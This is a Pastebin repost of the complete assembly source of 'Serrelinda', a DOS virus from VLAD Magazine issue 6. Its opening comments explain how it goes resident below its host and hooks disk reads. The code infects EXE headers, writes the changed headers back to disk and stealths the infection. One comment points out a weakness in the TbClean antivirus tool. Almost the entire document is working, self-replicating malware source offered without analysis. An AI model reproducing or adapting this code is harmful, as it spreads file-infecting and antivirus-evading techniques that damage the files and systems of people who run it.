API tools faq
paste
Advertisement
FlyFar

VLAD Magazine - Issue #6 - ARTICLE.5_3 - Serrelinda - EXE Header Infector

FlyFar
Nov 19th, 2023
1,931
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 5.96 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. ; Serrelinda, an EXE header infector by Rhincewind [Vlad]
  2. ;
  3. ; This is a fullstealth header infector with a twist: it goes resident
  4. ; underneath the hosting program, does not convert hosts to COM structure
  5. ; and is capable of restoring the host in memory (no reexecution).
  6. ; In short, it's the old principle all over again in a new implementation.
  7. ;
  8. ; Viruscode is inserted into the zerospace in suitable EXE headers, suitable
  9. ; meaning: no relocation items and a headersize of 512 bytes. The trick is
  10. ; to set the headersize to 32 bytes, and just zero CS:IP. This will cause
  11. ; the viruscode to be loaded below the host's code, giving the following
  12. ; memory order: MCB PSP VIRUS HOST. The virus switches context before copying
  13. ; itself over the PSP. The original MCB is adjusted to reflect the virussize
  14. ; and interpreter-ownership, and a 2nd MCB is created above the viruscode.
  15. ; Finally, a new PSP is created, and we have: MCB VIRUS MCB PSP HOST which
  16. ; is in a word, great. The only drawback is the memory fragmentation
  17. ; caused by the environment block no longer being attached to it's owning
  18. ; PSP. (non-consecutive MCBs with same ID field).
  19. ;
  20. ; Header infection is done on sector reads. A suitable header is read,
  21. ; infected, written back and then stealthed before it's returned.
  22. ; This is Serrelinda's safeguard. If ever you infect some files by accident,
  23. ; just copy them and reboot. Voila, la disinfection.
  24. ;
  25. ; Oh FYI, TbClean bails on int 21, ah=55 or ah=26 (create PSP).
  26. ; More on Frans' jumptables later.
  27. ;
  28. ; Rhince.
  29.  
  30.                 .model tiny
  31.                 .code
  32.                 org 0
  33. viruslen        equ (endvirus-start)
  34. start:        
  35.                 xor di,di
  36.                 mov si,di
  37.                 mov bx, word ptr ds:[si+16h]
  38.                 mov ah, 50h
  39.                 int 21h
  40.                 mov cx, 00ffh
  41.                 push cx
  42.                 push word ptr ds:[si+2ch]
  43.                 push cs
  44.                 pop ds
  45.                 rep movsb
  46.                 mov virseg,es
  47.                 jmp $+2
  48.                 db 0eah
  49.                 dw offset low_entry
  50. virseg          dw 0
  51. low_entry:      mov cx, viruslen-0ffh
  52.                 rep movsb
  53.                 mov ax,cs
  54.                 dec ax
  55.                 mov ds,cx
  56.                 mov si,13h*4
  57.                 movsw
  58.                 movsw
  59.                 mov si,ds
  60.                 mov ds,ax
  61.                 mov di, 1d0h
  62.                 mov al, 'M'
  63.                 xchg al, byte ptr ds:[si]
  64.                 stosb
  65.                 scasw
  66.                 mov word ptr ds:[si+1],bx
  67.                 mov ax, 01dh
  68.                 xchg word ptr ds:[si+3],ax
  69.                 sub ax, word ptr ds:[si+3]
  70.                 stosw
  71.                 mov dx,es
  72.                 add dx,1eh
  73.                 mov ah, 55h
  74.                 int 21h
  75.                 mov word ptr es:[di-4],dx
  76.                 pop cx
  77.                 dec cx
  78.                 mov es,cx
  79.                 mov word ptr es:[1],dx
  80.                 push dx
  81.                 mov ax, offset int13+10h
  82.                 mov dx, 2513h
  83.                 xchg ax,dx
  84.                 int 21h
  85. installed:      pop bx
  86.                 mov ds,bx
  87.                 mov es,bx
  88.                 add bx, 10h
  89.                 add word ptr cs:[jmp_cs],bx
  90.                 inc cx
  91.                 mov word ptr ds:[2ch], cx
  92.                 pop cx
  93.                 xor ax,ax
  94.                 mov bx,ax
  95.                 mov si,ax
  96.                 mov di,sp
  97.                 jmp $+2
  98.                 db 0eah
  99. jmp_ip          dw 0
  100. jmp_cs          dw -10h
  101. int13:                
  102.                 cmp ah,2
  103.                 jz do_it
  104. go_go_int13:
  105.                 jmp go_int13
  106. do_it:
  107.                 pushf
  108.                 call dword ptr cs:int13offset+10h
  109.                 push ax
  110.                 pushf
  111.                 jc go_wrong_file
  112.                 mov ax, word ptr es:[bx]
  113.                 xor al,ah
  114.                 cmp al, 4dh xor 5ah
  115.                 jz exe_file
  116. go_wrong_file:  jmp wrong_file_bubba
  117.                 db '[Serrelinda], Rhince/VLAD'
  118. exe_file:
  119.                 xor ax,ax
  120.                 cmp word ptr es:[bx+6],ax
  121.                 jnz go_wrong_file
  122.                 cmp word ptr es:[bx+1ah],ax
  123.                 jnz go_wrong_file
  124.                 cmp word ptr es:[bx+20h],0FF33h
  125.                 jz mr_stealth
  126.                 cmp word ptr es:[bx+8],20h
  127.                 jnz go_wrong_file
  128. infect:
  129.                 add word ptr es:[bx+0eh],20h
  130.                 mov ax, word ptr es:[bx+14h]
  131.                 mov word ptr cs:[jmp_ip+10h],ax
  132.                 mov ax, word ptr es:[bx+16h]
  133.                 mov word ptr cs:[jmp_cs+10h],ax
  134.                 mov word ptr es:[bx+8],2
  135.                 push cx
  136.                 push si
  137.                 push di
  138.                 push ds
  139.                 push cs
  140.                 pop ds
  141.                 mov si, 10h
  142.                 lea di, [bx+20h]
  143.                 mov cx, (endvirus-start)
  144.                 cld
  145.                 rep movsb
  146.                 mov word ptr es:[bx+14h], cx
  147.                 mov word ptr es:[bx+16h], cx
  148.                 xchg ax,cx
  149.                 pop ds
  150.                 pop di
  151.                 pop si
  152.                 pop cx
  153.                 add ax, 0301h
  154.                 int 13h
  155. mr_stealth:
  156.                 sub word ptr es:[bx+0eh],20h
  157.                 mov ax, word ptr es:[bx+jmp_ip+20h]
  158.                 mov word ptr es:[bx+14h],ax
  159.                 mov ax, word ptr es:[bx+jmp_cs+20h]
  160.                 mov word ptr es:[bx+16h],ax
  161.                 mov word ptr es:[bx+8],20h
  162.                 push cx
  163.                 push di
  164.                 cld
  165.                 mov cx, (endvirus-start)
  166.                 lea di, [bx+20h]
  167.                 xor al,al
  168.                 rep stosb
  169.                 pop di
  170.                 pop cx
  171. wrong_file_bubba:
  172.                 popf
  173.                 pop ax
  174.                 retf 2
  175. go_int13:
  176.                 db 0eah
  177. endvirus:
  178. int13offset     dw 0
  179. int13seg        dw 0
  180.                 end start
Tags: virus Header exe infector fullstealth
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!